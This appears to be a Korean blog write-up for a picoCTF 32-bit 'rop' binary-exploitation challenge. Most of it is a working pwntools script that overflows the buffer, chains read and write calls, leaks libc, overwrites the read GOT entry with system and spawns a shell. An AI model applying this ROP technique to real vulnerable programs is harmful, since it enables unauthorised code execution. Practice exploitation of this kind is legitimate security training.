뚜룬 ~~~ 32비트~~~~ ㅇ니ㅏㅁ러;ㅣ자덞;ㅣㅏㅈㄷ러
익스합시다..
read write 있네요... 익스시키면되요..ㅎㅎ
그냥 익스하면됩니다..ㅎㅎ..
from pwn import *
p = process("./rop")
binf = ELF("./rop")
context.terminal = ['tmux', 'splitw', '-h']
#gdb.attach(p)
pppr = 0x0804855d
bss = 0x0804a020
offset = 0x9ad60
addr_read_plt = binf.plt['read']
addr_read_got = binf.got['read']
addr_write_plt = binf.plt['write']
addr_write_got = binf.got['write']
payload = "A"*140
payload += p32(addr_read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)
payload += p32(addr_write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(addr_read_got)
payload += p32(4)
payload += p32(addr_read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(addr_read_got)
payload += p32(4)
payload += p32(addr_read_plt)
payload += "A"*4
payload += p32(bss)
addr_system_got = addr_read_got - offset
p.send(payload)
p.send("/bin/sh")
read_leak = u32(p.recv(8))
log.info("leak :" + hex(read_leak))
system = read_leak - offset
log.info("system :" + hex(system))
p.send(p32(system))
p.interactive()처음에 이거하는데 자꾸 system 오프셋이 이상하게 들어가서 삽질좀 하다가 겨우됨...ㅎㅎ... 그리고 가젯 하나 빼먹어서 또 안됬다가 한 10분? 정도 뻘짓하다 풀림...ㅎㅎ...
'CTF > Picoctf' 카테고리의 다른 글
| picoctf pwnable_NewOverFlow Write up (0) | 2019.10.22 |
|---|---|
| picoctf pwnable_rop_2 Write up (0) | 2019.10.20 |
| picoctf pwnable_rop_1 Write up (0) | 2019.10.20 |
